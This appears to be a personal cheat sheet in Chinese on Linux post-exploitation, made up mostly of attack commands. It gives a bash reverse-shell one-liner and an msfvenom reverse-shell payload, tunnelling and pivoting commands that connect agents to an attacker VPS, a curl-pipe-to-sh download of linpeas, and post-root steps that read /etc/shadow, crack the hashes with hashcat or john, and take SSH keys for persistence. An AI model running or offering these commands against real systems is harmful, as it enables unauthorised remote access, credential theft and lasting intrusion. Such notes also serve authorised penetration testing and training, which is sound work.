Linux 後滲透
Reverse shell
- bash:
bash -c 'bash -i >& /dev/IP/PORT 0>&1'
- Msfvenom
msfvenom -p linux/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > s.elf
- rlwrap 做比較好用的shell
rlwrap <reverse shell>
Port Forwarding(端口轉發 代理)
用途:内網橫向、當作 跳板
【ATT&CK】端口轉發技術大全 https://mp.weixin.qq.com/s/FNCdKsPwu0_kD-4INn3faQ https://mp.weixin.qq.com/s/zwaeUD7-QMTYgvymgw2EVQ https://github.com/twelvesec/port-forwarding?tab=readme-ov-file
-
proxychains
- sudo vim /etc/proxychains4.conf
- socks5 127.0.0.1 9487
- Usage:
proxychains <command>
-
SSH Tunnel
- Local Port Forwarding:
ssh -L [local_port]:[remote_host]:[remote_port] [user]@[ssh_server]
- Remote Port Forwarding:
ssh -R kali:<port> user@linux host
(受害主機) - Dynamic Port Forwarding:
ssh –D 127.0.0.1:9487 user@hostA
(受害主機) - socks server
- Local Port Forwarding:
Host:
sudo ./proxy -autocert
or
sudo ./proxy -selfcert
agent:
./agent -connect [VPS_IP]:11601
or
./agent -connect [VPS_IP]:11601 -ignore-cert
- Chisel
- netsh portproxy (Windows)
netsh interface portproxy add v4tov4 listenaddress=<ip> listenport=<port> connectaddress=<tgt_ip> connectport=<tgt_port>
- netsh portproxy (Windows)
- reGeorg
- tunnel.ashx 放在目標機上
- 攻擊機上執行:
python2 reGeorgSocksProxy.py -u {url} -p {port}
- Neo-reGeorg
python neoreg.py generate –k 密碼
python neoreg.py –k 密碼 –u 網址
- 多層跳板:Venom
Linux 後滲透
information gathering
- hostname:電腦的名稱
- uname -a: 系統的核心版本
- ps aux / top:電腦的執行 process
- ifconfig / ip a:電腦的網路資訊
- pwd:當前的資料夾
- w:登入的 TTY 資訊
- cat /etc/passwd:電腦中的使用者資訊
Privilege escalation (提權)
Misconfiguration
sudo -l
--> 找 root 能夠執行的 binary- https://gtfobins.github.io/ --> 找該 binary 的提權腳本 --> 根據 sudo -l 確認 sudo 權限能執行的 binary,執行相對應的提權腳本
自動化尋找錯誤配置
- Linpeas
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
--> 輸出結果依照組態錯誤或是資訊洩漏,進行相對應的提權手法
拿到root之後
cat /etc/shadow
- dump password hash -->
sha512($6$)
,hashcat 或 john 做爆破。
- dump password hash -->
cat ~/.ssh/isa_key
- 拿key做維持權限
- ssh -i
<key>